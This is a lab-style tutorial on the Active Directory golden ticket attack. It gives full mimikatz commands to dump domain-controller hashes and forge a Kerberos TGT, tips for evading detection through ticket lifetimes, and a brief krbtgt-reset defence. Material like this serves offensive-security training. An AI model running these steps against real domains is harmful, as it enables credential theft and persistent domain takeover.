So Golden ticket attack is one of the ways to gain domain persistence once you have gained domain admin. To understand this attack please make sure you have a good understanding of Kerberos and its process. You can read my detailed explanation here. If you have recalled how Kerberos works let’s see where this attack fits in the cycle.
On step 3 of the process when the client sends a TGT to the ticket granting server that is where we can send a forged TGT and get a valid Service ticket from the KDC.
Golden ticket attack refers to forging a Fake Ticket Granting Ticket and sending it to the KDC. The ticket-granting ticket is encrypted with the hash of the KRBTGT account. This is the secret key that can help us make a valid TGT. Hence we can gain persistence on the system by forging as many TGT’s as we want for any user or service account.
Golden ticket attack in action
First, we need to have domain admin privileges on the system. I have already opened an elevated shell on a system with domain admin privileges. soon I will cover other privilege escalation techniques soon but for now, we have a domain admin session on a remote computer.
I had a session on dcorp-dc.dollarcorp.moneycorp.local and I loaded mimikatz in that session. At last, I entered the ps-session and dumped all the hashes from the dc.
PS C:\AD\Tools> $sess = New-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
PS C:\AD\Tools> Invoke-Command -Session $sess -FilePath .\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Enter-PSSession -Session $sess
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY gentilkiwi ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-1874506631-3219952063-538504511
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760
We will find the KRBTGT hash from the dump which is the 3rd one from the top. Next step is to forge a malicious TGT.
Generating a Golden ticket
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:bc7c774ae1c2f9325adee16ff86681fc id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt"' The command to generate a golden ticket with mimikatz is given above lets take a deeper look at all its options.
Invoke-mimikatz – this is the powershell function we get after loading Invoke-mimikatz.ps1 in the session and -Command is to specify a command.
kerberos::golden – is the module name in mimikatz to generate golden tickets.
/User:Administrator – /User is to specify a user name and id in the TGT.
/domain:dollarcorp.moneycorp.local – is to specify the FQDN or the domain name.
/sid:S-1-5-21-1874506631-3219952063-538504511 – is to specify the domain sid.
/krbtgt:ff46a9d8bd66c6efd77603da26796f35 – is to specify the krbtgt hash we can use /aes128 and /aes256 to specify symmetric keys.
id:500 /groups:512 – these are to specify user id and group but this is optional
/startoffset:0 – this is optional parameter but 0 minutes means the ticket will be available right now. We can use negative to specify time in the past and a higher number to specify something in the future.
/endin:600 – this option will specify the lifetime of the ticket mimikatz by default sets it to 10 years which can be easily detected so use 600 minutes which is AD Default.
/renewmax:10080 – ticket renewal time by default in mimikatz is again 10 years but we will set it to 10080 which is 7 days and its AD Default.
/ptt – this option stands for pass the ticket it will load the ticket in memory. if we want to extract ticket on disk we can use /ticket option instead.
Now if we run the command above we get a golden ticket that is created and stored in our current session. If we run klist we can see we have the ticket.
Proof of concept
Now if we run ls on the dc’s c$ share we can successfully read files because we had the administrators TGT we could get the TGS for the CIFS that is the file system on the dc.
If we list our kerberos tickets now we see there are 3 tickets available now 3rd one being the cifs service ticket.
Defending against golden ticket attack
To defend against this attack make sure to change your krbtgt account password twice. If you do it once that will not work since the hash is matched with both the current password and the password history. Another thing to note is to have at least 8-12 hours difference withing the two password changes.
